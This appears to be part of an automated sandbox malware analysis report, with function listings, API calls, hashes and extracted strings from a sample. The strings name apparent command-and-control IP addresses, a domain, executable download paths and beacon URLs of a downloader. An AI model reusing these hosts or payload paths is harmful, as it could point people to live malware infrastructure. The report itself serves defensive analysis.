/timeSync.exe, xrefs: 05D159C6, 05D15A59, 05D15AC7
note.padd.cn.com, xrefs: 05D15BA9, 05D15C61, 05D15D66
.zip, xrefs: 05D15DC4, 05D15DE6
P, xrefs: 05D1575C
Installed, xrefs: 05D15466, 05D154C4
.exe, xrefs: 05D1618D, 05D161AF
/ping.php?substr=%s, xrefs: 05D155EE, 05D156C4, 05D156DC
185.172.128.228, xrefs: 05D15F88, 05D16034, 05D16139
185.172.128.228, xrefs: 05D15527, 05D155CD, 05D1574C
/syncUpd.exe, xrefs: 05D15923, 05D159A5, 05D15AD6
185.172.128.90, xrefs: 05D1521A, 05D152B4, 05D15302
iC, xrefs: 05D15E24
SOFTWARE\BroomCleaner, xrefs: 05D15358, 05D1544C
P, xrefs: 05D15D77
P, xrefs: 05D15ABC
@, xrefs: 05D14CE3
/BroomSetup.exe, xrefs: 05D1604E, 05D160F4, 05D16142
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 05D1501D, 05D151B3, 05D151CC

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: @$ iC$.exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com
API String ID: 2531350358-3920416335
Opcode ID: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction ID: ae3b4d37f0f96f5f617f95a8db7cc588c1814f1f1e966f4a11574e8aca8402c5
Opcode Fuzzy Hash: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction Fuzzy Hash: 24A2121061B2D0BEC791B77C5C5A7CE2BE0AB63640F547CAAC3A45B362DB54810CE7DA

Uniqueness

Uniqueness Score: -1.00%

Function 0042086B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetUserDefaultLCID.KERNEL32 ref: 00420977
IsValidCodePage.KERNEL32(00000000), ref: 004209D2
IsValidLocale.KERNEL32(?,00000001), ref: 004209E1
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420A29
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00420A48

Strings

,CUSA, xrefs: 004208D0

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: ,CUSA
API String ID: 745075371-2978500865
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 7ddd42caa13bcc6a581a5d9380eb1867f4bda1d866acf156490288d52a5f9f8d
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 2351A4B1B002299BEB20DFA5EC45BBF77F8AF04700F54056BE505E7252D7789980CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042140C Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00421552

Strings

1#INF, xrefs: 0042275F
1#IND, xrefs: 0042274A
1#SNAN, xrefs: 00422751
1#QNAN, xrefs: 00422758

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction ID: ba3d8f5800837f2e7df06b198bc907b13d59b0e20819b9a43c463b3a9b279e29
Opcode Fuzzy Hash: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction Fuzzy Hash: 04C25A71E082289FDB25CE28ED407EAB7B5EB94304F5541EBD84DE7250E778AE818F44

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF33 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

IsValidCodePage.KERNEL32(00000000), ref: 00420015
_wcschr.LIBVCRUNTIME ref: 004200A5
_wcschr.LIBVCRUNTIME ref: 004200B3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00420156

Strings

,CUSA, xrefs: 0041FF71

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: ,CUSA
API String ID: 4212172061-2978500865
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: fa09c2a12b3627a5d585845c4e70effd6588540dd04b31b38b5545ebe516d264
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: 2C610871700216AAE724AB35EC42BEB77E8EF04314F14403FF505D7282EA79E986C769

Uniqueness

Uniqueness Score: -1.00%

Function 05D108FE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 05D10997
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 05D109C0
GetACP.KERNEL32 ref: 05D109D5

Strings

OCP, xrefs: 05D10952
ACP, xrefs: 05D1091C

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: 62954352e05b96ba792e43f3c2d4da3bf39e522aff105338ffab6df346e6dfeb
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 6F21B522B04104FBF730AF55E928BA772A7BB44A60B4A8467ED4BD7101E732D9C0C798

Uniqueness

Uniqueness Score: -1.00%

Function 00420697 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00420730
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00420759
GetACP.KERNEL32 ref: 0042076E

Strings

ACP, xrefs: 004206B5
OCP, xrefs: 004206EB

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: ccfaff94e51ab864e712d9520aeba98098d7830e350b78e24d8ea24043a496f3
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 8821F422B00125ABD7308F14E900A9BB3E6ABD4B50BD68176E90AD7312E736ED41CB48

Uniqueness

Uniqueness Score: -1.00%

Function 05D10AD2 Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE

Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FDF
Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FEC

GetUserDefaultLCID.KERNEL32 ref: 05D10BDE
IsValidCodePage.KERNEL32(00000000), ref: 05D10C39
IsValidLocale.KERNEL32(?,00000001), ref: 05D10C48
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 05D10C90
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 05D10CAF

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 3b700dc46681c4249bc3b0e42643c4a892c5f17427eb3f5940d7f06dba089182
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 77519371A04219BBDB20FFA5EE48ABA73B9FF08705F044067ED05E7190DB709980CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004123A0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

y%B, xrefs: 004123BD, 00412568, 0041278C, 00412726, 004125B6, 00412544
y%B, xrefs: 00412808, 004125F2, 00412481

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID: y%B$y%B
API String ID: 0-2510245575
Opcode ID: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction ID: 7f81a5055d29d3c9b3a65b9dd9c97bea9b47a5c616e9cad61c519a63aba044dd
Opcode Fuzzy Hash: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction Fuzzy Hash: F8024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94

Uniqueness

Uniqueness Score: -1.00%

Function 05D1019A Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE

IsValidCodePage.KERNEL32(00000000), ref: 05D1027C
_wcschr.LIBVCRUNTIME ref: 05D1030C
_wcschr.LIBVCRUNTIME ref: 05D1031A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 05D103BD

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: 82e598c26729f893d9d95fcdad6112bb58216a4de1036c4813a9dffd72bd7d14
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: 2D61A572604206BBD724FB64EC49BB677A8FF08310F14446BED46DB190EA74E98487A8

Uniqueness

Uniqueness Score: -1.00%

Function 0042031E Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420372
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004203C3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420483

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction ID: 150eb58c917d6dfbd7f4c2a18d44eb002ac57a30d794a2eb47e087b0f294e0c3
Opcode Fuzzy Hash: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction Fuzzy Hash: D46185717001279BDB28DF25DC81BB677E8EF14344F50807AE905C6642E77CE995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 05D009A2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 05D00A9A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 05D00AA4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 05D00AB1

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: d041c25b3779c60b1b7b33e0a5b7c9248bad5066cc3856b02155e9d0ae500df1
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: 7A31B47490122CABCF61DF64D888B99B7B8BF08310F5055EAE50CA7290E7309F858F45

Uniqueness

Uniqueness Score: -1.00%

Function 0041073B Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: d1fab33c372cae0273f805137467810c70e9cba24fd9c5a15224a60e011b092e
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: E031C47490121C9BCB21EF25D9887CDB7B8BF08310F5041EAE41CA7291E7749F858F88

Uniqueness

Uniqueness Score: -1.00%

Function 05D03C4E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,05D03C24,00000003,00438DB0,0000000C,05D03D7B,00000003,00000002,00000000,?,05D02DD2,00000003), ref: 05D03C6F
TerminateProcess.KERNEL32(00000000,?,05D03C24,00000003,00438DB0,0000000C,05D03D7B,00000003,00000002,00000000,?,05D02DD2,00000003), ref: 05D03C76
ExitProcess.KERNEL32 ref: 05D03C88

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 3989f2a69d0d8c23c1cddba8b1566c69ca1086bab88f0e01792154a4b0e5cb39
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: B5E0B631200549ABCF216F65DE0CB993F6AFB44291F509425FD4ACA271CB35EE52CA98

Uniqueness

Uniqueness Score: -1.00%

Function 05CF092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 05CF09DC, 05CF09DF, 05CF09E4
l, xrefs: 05CF0966
., xrefs: 05CF095F

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: d10baf1ef282ae4f45510ec5c37512136d06f4407301195a7476a50476b52e3b
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 7B318CB6900609CFDB10CF99C884AAEBBF5FF08724F14444AD942B7311D771EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004174E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537

Strings

GetLocaleInfoEx, xrefs: 004174F5, 004174FF

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction ID: 87fd85214f38bea17e9e0867028b4e6f8bd84d2b32a19a69094aa8269c1633f8
Opcode Fuzzy Hash: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction Fuzzy Hash: 0AF0F631740218B7DB11AF61AC01FBE3B72DF04710F90007AFC0926291CA355E60969D

Uniqueness

Uniqueness Score: -1.00%

Function 05D02607 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction ID: 2116a261062f139c2ed6a3052d8727b877e6f44aa7b8d814d88c90b3b805de04
Opcode Fuzzy Hash: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction Fuzzy Hash: 50022C75E012199FDF14CFA9D884BAEB7F1FF88314F25816AD819E7284D731AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05CFCA63 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 05CFCA8A
@, xrefs: 05CFCAAA

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: 5ac474f401ff84d65a7c00b8ab40d9ec956735ab5d828acb833d15ba63f7450e
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: 53318E3A34C1864BC355C73DD8B45F2B781FAC6130B2D8BF9D2828F24AD2A69E46D700

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7FC Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 0040C823
@, xrefs: 0040C843

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: bacc100dc0a0088e2915408729627ff8f5d38c09acb905e5d4049eb219c2e84e
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: 9E314B67144182CBD2049728C8E45B7B781FA8532272DC3FBD091AB7CAD23E9847960C

Uniqueness

Uniqueness Score: -1.00%

Function 05D0B989 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,05D0B984,00000000,?,00000008,?,?,05D13766,00000000), ref: 05D0BBB6

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: a7f4f3467a68bfd87bc73f99087a33569a130117feb8e7a57074538f485f21eb
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: F6B159316186088FE715CF28C48AB697BE1FF04365F29965AE8DACF2E1C735D981CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0041B722 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B71D,?,?,00000008,?,?,004234FF,00000000), ref: 0041B94F

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: 77e1d80032caf57d447ccd467e54c4f0879ce58ba2590176158d9b4cb40e0a8d
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: F4B13C71620608DFD715CF28C48ABA57BE0FF45364F298659E999CF3A1C339D982CB84

Uniqueness

Uniqueness Score: -1.00%

Function 05D107D5 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE

Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FDF
Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05D10829

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: 65949ae6c3975571c3180a52f693a315f800330f0346ec938dd776e8672bbbff
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: 6821C47261420AABDB24BA64EC48F7A77A8EB40310F00017BED05C6180EB34D984CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0042056E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205C2

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: 81f412bf0acab0c669cc413bed1d2c5f28af9b0bc2236bf2d8b3c2af5f6810e7
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: CD21A472A10126AFDB249F25EC41BBB73E8EB84314F50007BE905D6242EB78AD94CB59

Uniqueness

Uniqueness Score: -1.00%

Function 05D1045D Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 05D104CF

Memory Dump Source

